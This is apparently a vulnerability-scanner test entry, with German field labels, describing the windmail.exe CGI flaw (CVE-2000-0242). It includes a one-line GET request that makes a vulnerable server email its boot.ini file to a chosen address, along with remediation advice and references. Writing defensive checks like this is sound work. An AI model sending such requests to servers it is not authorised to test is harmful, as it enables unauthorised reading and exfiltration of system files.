Test Kennung:	1.3.6.1.4.1.25623.1.0.10365
Kategorie:	CGI abuses
Titel:	Windmail.exe allows any user to execute arbitrary commands
Zusammenfassung:	NOSUMMARY
Beschreibung:	Description: The 'windmail.exe' CGI is installed. Some versions of this CGI script have a security flaw that lets an attacker execute arbitrary commands on the remote server. To test this, make the following request : GET /cgi-bin/windmail.exe?-n%20c:\boot.ini%20you@youraddress.com (replace you@youraddress.com by your real email address). If you receive the content of the file boot.ini, then your server is vulnerable. Solution : remove it from /cgi-bin. See www.geocel.com for a new version. Risk factor : High
Querverweis:	BugTraq ID: 1073 Common Vulnerability Exposure (CVE) ID: CVE-2000-0242 http://www.securityfocus.com/bid/1073 Bugtraq: 20000325 Windmail allow web user get any file (Google Search) http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com XForce ISS Database: windmail-fileread XForce ISS Database: windmail-pipe-command
Copyright	This script is Copyright (C) 2000 Renaud Deraison

Dies ist nur einer von 145615 Anfälligkeitstests in unserem Testpaket. Finden Sie mehr über unsere vollständigen Sicherheitsüberprüfungen heraus. Um einen gratis Test für diese Anfälligkeit auf Ihrem System durchlaufen zu lassen, registrieren Sie sich bitte unten.